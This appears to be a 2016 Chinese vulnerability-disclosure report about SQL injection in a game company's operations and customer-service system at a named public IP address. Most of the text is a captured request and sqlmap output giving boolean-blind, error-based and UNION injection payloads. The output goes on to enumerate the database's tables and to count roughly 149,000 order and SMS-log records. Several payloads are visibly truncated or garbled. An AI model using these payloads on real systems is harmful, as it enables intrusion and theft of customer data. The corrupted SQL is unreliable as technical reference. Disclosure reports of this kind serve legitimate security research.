2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-12: 厂商已经确认,细节仅向厂商公开 2016-01-22: 细节向核心白帽子及相关领域专家公开 2016-02-01: 细节向普通白帽子公开 2016-02-11: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
营运系统
http://222.73.243.217/
抓包:
POST /syswork/carryon/carryonlist.php HTTP/1.1Host: 222.73.243.217User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://222.73.243.217/syswork/carryon/carryonlist.phpCookie: PHPSESSID=bess3o040r75dsr9cssnpb49s4Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 135__EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&game_type=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11&datetext=
多参数都存在注入:
Place: POSTParameter: datetextE Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' AND 1919=1919per'='aper&datetext= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' AND (SELECT 46M(SELECT COUNT(*),CONCAT(0x3a786c6f3a,(SELECT (CASE WHEN (4623=4623) THEN 0 END)),0x3a6d6a6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTERGROUP BY x)a) AND 'fqTY'='fqTY&datetext= Type: UNION query Title: MySQL UNION query (NULL) - 16 columns Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' UNION ALL SELEL, NULL, NULL, CONCAT(0x3a786c6f3a,0x57437461647077797a53,0x3a6d6a6b3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'nogZZ&datetext=Place: POSTParameter: datetextS Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&ype=-1&content=1&datetextS=2016-01-11' AND 7224=7224 AND 'FgUt'='FgUt&date2016-01-11&datetext= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&ype=-1&content=1&datetextS=2016-01-11' AND (SELECT 7654 FROM(SELECT COUNT(CAT(0x3a786c6f3a,(SELECT (CASE WHEN (7654=7654) THEN 1 ELSE 0 END)),0x3a6d,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AQO'='vsQO&datetextE=2016-01-11&datetext=---there were multiple injection points, please select the one to use for fol injections:[0] place: POST, parameter: datetextE, type: Single quoted string (default[1] place: POST, parameter: datetextS, type: Single quoted string[q] Quit>[18:40:52] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.28back-end DBMS: MySQL 5.0[18:40:52] [INFO] fetching current usercurrent user: 'uYW4Y7N27EDVL@10.240.31.6'
available databases [2]:[*] information_schema[*] mobilecsms
122表
Database: mobilecsms[94 tables]+---------------------------------------+| KNOWLEDGE || K_SORTS || OPERATERECORD || SHIFTKNOWLEDGE || SHIFTOPERATERECORD || SK_SORTS || account_info_audited || account_info_audited_log || account_invoice || account_label || account_label_to_uid || account_lock || account_old_player || account_query_log || base_gm_work_field || base_msg_work_field || basic_coding || basic_country || basic_dept || basic_faq_sort || basic_game || basic_group || basic_menu || basic_model || basic_page || basic_resource || basic_resource2dept || basic_resource2group || basic_resource2user || basic_resourceinpage || basic_role || basic_skfaq_sort || basic_treenode || basic_user || basic_user2role || basic_user_online || basic_userindept || basic_useringroup || call_num || call_sta_time || cs_carryon || cs_coutomerinfo || cs_coutomerinfo_history || cs_dealwithorder || cs_dealwithorder_history || cs_lost_reason || cs_lost_reason_order || cs_order || cs_order_history || cs_order_invalid || cs_order_print || cs_ordertype || cs_overtime_sta || cs_overtime_standard || cs_overtime_standard_tt || cs_poll || cs_sta_cust_info || cs_sta_cust_info_tmp || cs_standard_reply || file_upload || game_gm_work_of_day || game_log_redeem || game_log_redeem_audit || game_msg_work_of_day || game_redeem || game_redeem_apply_user || game_redeem_audit || game_redeem_audit_list || game_redeem_audit_money || game_redeem_item || game_zone_info || internal_account || log_account_disputed || log_account_rollback || log_account_rollback_balance || log_fail_itil || log_gamerole_lock_unlock || order_num_alert_time || pilfer_account_order || poll_rating || ps_template || ps_template_ordertype || question_agreement || question_element || question_list || question_table || role_separation_info || self_service_config || send_sms_log || test || tmplog || uid_notcheck_pay || user_account_prerogative || user_acotype |+---------------------------------------+Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
Database: mobilecsms+----------+---------+| Table | Entries |+----------+---------+| cs_order | 149141 |+----------+---------+
15万日志
Database: mobilecsms+--------------+---------+| Table | Entries |+--------------+---------+| send_sms_log | 149379 |+--------------+---------+
危害等级:高
漏洞Rank:20
确认时间:2016-01-12 11:48
感谢路人甲,此网站已限制访问
暂无
(⊙0⊙)
你的一个20rank要我刷多少台湾的才够
你家的大龙虾还卖不。